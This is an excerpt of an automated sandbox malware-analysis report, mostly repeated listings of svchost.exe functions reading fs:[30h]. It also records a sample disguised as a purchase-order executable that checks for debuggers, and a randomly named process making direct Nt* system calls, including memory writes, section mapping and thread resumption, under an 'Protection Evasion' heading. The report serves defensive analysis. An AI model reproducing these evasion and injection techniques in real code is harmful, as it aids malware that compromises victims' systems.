            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]2_2_037BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]2_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]2_2_037B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]2_2_037B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]2_2_037C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]2_2_037BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]2_2_037BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]2_2_037649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]2_2_037FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]2_2_037C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]2_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h] 2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h] 2_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h] 2_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h] 2_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h] 2_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h] 2_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h] 2_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03760854 mov eax, dword ptr fs:[00000030h] 2_2_03760854
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h] 2_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h] 2_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h] 2_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h] 2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h] 2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h] 2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h] 2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h] 2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h] 2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376A830 mov eax, dword ptr fs:[00000030h] 2_2_0376A830
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D483A mov eax, dword ptr fs:[00000030h] 2_2_037D483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D483A mov eax, dword ptr fs:[00000030h] 2_2_037D483A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BC810 mov eax, dword ptr fs:[00000030h] 2_2_037BC810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0376C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0376C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037FA8E4 mov eax, dword ptr fs:[00000030h] 2_2_037FA8E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375E8C0 mov eax, dword ptr fs:[00000030h] 2_2_0375E8C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BC89D mov eax, dword ptr fs:[00000030h] 2_2_037BC89D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03730887 mov eax, dword ptr fs:[00000030h] 2_2_03730887
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h] 2_2_0375AF69
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h] 2_2_0375AF69
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D2F60 mov eax, dword ptr fs:[00000030h] 2_2_037D2F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D2F60 mov eax, dword ptr fs:[00000030h] 2_2_037D2F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h] 2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h] 2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h] 2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h] 2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h] 2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h] 2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376CF50 mov eax, dword ptr fs:[00000030h] 2_2_0376CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D0F50 mov eax, dword ptr fs:[00000030h] 2_2_037D0F50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h] 2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h] 2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h] 2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h] 2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D4F42 mov eax, dword ptr fs:[00000030h] 2_2_037D4F42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375EF28 mov eax, dword ptr fs:[00000030h] 2_2_0375EF28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03732F12 mov eax, dword ptr fs:[00000030h] 2_2_03732F12
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804FE7 mov eax, dword ptr fs:[00000030h] 2_2_03804FE7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376CF1F mov eax, dword ptr fs:[00000030h] 2_2_0376CF1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E6F00 mov eax, dword ptr fs:[00000030h] 2_2_037E6F00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h] 2_2_03770FF6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h] 2_2_03770FF6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h] 2_2_03770FF6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h] 2_2_03770FF6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E6FF7 mov eax, dword ptr fs:[00000030h] 2_2_037E6FF7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0374CFE0 mov eax, dword ptr fs:[00000030h] 2_2_0374CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0374CFE0 mov eax, dword ptr fs:[00000030h] 2_2_0374CFE0
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_004238DA
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_0041F250 SetUnhandledExceptionFilter, 0_2_0041F250
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041A208
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00417DAA

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtWriteVirtualMemory: Direct from: 0x77762E3C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtMapViewOfSection: Direct from: 0x77762D1C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtNotifyChangeKey: Direct from: 0x77763C2C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtCreateMutant: Direct from: 0x777635CC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtResumeThread: Direct from: 0x777636AC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtProtectVirtualMemory: Direct from: 0x77757B2E
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtQuerySystemInformation: Direct from: 0x77762DFC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtAllocateVirtualMemory: Direct from: 0x77762BFC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtReadFile: Direct from: 0x77762ADC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtDelayExecution: Direct from: 0x77762DDC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtWriteVirtualMemory: Direct from: 0x7776490C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtQueryInformationProcess: Direct from: 0x77762C26
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtResumeThread: Direct from: 0x77762FBC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtCreateUserProcess: Direct from: 0x7776371C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtSetInformationThread: Direct from: 0x777563F9
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtAllocateVirtualMemory: Direct from: 0x77763C9C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtSetInformationThread: Direct from: 0x77762B4C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtQueryAttributesFile: Direct from: 0x77762E6C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtReadVirtualMemory: Direct from: 0x77762E8C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtCreateKey: Direct from: 0x77762C6C
